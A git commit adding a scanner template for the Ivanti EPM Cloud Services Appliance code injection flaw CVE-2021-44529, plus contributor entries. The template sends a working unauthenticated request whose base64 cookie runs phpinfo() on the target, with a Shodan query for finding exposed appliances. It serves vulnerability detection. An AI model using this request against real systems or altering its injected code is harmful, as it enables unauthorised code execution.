Ivanti EPM CSA Code Injection(CVE-2021-44529) (#3937)

* Added CVE-2021-44529 * Added CVE-2021-44529 * Added CVE-2021-44529 * metadata updates * contributors update Co-authored-by: Tirtha Mandal <darkc0d3@Tirthas-MacBook-Pro.local> Co-authored-by: sandeep <sandeep@projectdiscovery.io>
2022-03-20 13:14:37 +05:30 · 2022-03-20 13:14:37 +05:30 · 36ff44ab40
parent c96d63b3fc
commit 36ff44ab40
2 changed files with 65 additions and 0 deletions
--- a/contributors.json
+++ b/contributors.json
@ -1,4 +1,34 @@
 [
+    {
+        "author": "Tirtha",
+        "links": {
+            "github": "https://github.com/darkc0d37",
+            "twitter": "https://twitter.com/tirtha_mandal",
+            "linkedin": "",
+            "website": "",
+            "email": ""
+        }
+    },
+    {
+        "author": "duty_1g",
+        "links": {
+            "github": "",
+            "twitter": "https://twitter.com/duty_1g",
+            "linkedin": "",
+            "website": "",
+            "email": ""
+        }
+    },
+    {
+        "author": "phyr3wall",
+        "links": {
+            "github": "",
+            "twitter": "https://twitter.com/phyr3wall",
+            "linkedin": "",
+            "website": "",
+            "email": ""
+        }
+    },
    {
        "author": "0xPrial",
        "links": {
--- a/cves/2021/CVE-2021-44529.yaml
+++ b/cves/2021/CVE-2021-44529.yaml
@ -0,0 +1,35 @@
+id: CVE-2021-44529
+
+info:
+  name: Ivanti EPM Cloud Services Appliance code injection
+  author: duty_1g,phyr3wall,Tirtha
+  severity: critical
+  description: |
+    A code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).
+  reference:
+    - https://twitter.com/Dinosn/status/1505273954478530569
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44529
+    - https://forums.ivanti.com/s/article/SA-2021-12-02
+  metadata:
+    shodan-query: title:"LANDesk(R) Cloud Services Appliance"
+  tags: cve,cve2021,ivanti,epm,csa
+
+requests:
+  - raw:
+      - |
+        GET /client/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "phpinfo()"
+          - "Cloud Services Appliance"
+        condition: and
+
+      - type: status
+        status:
+          - 200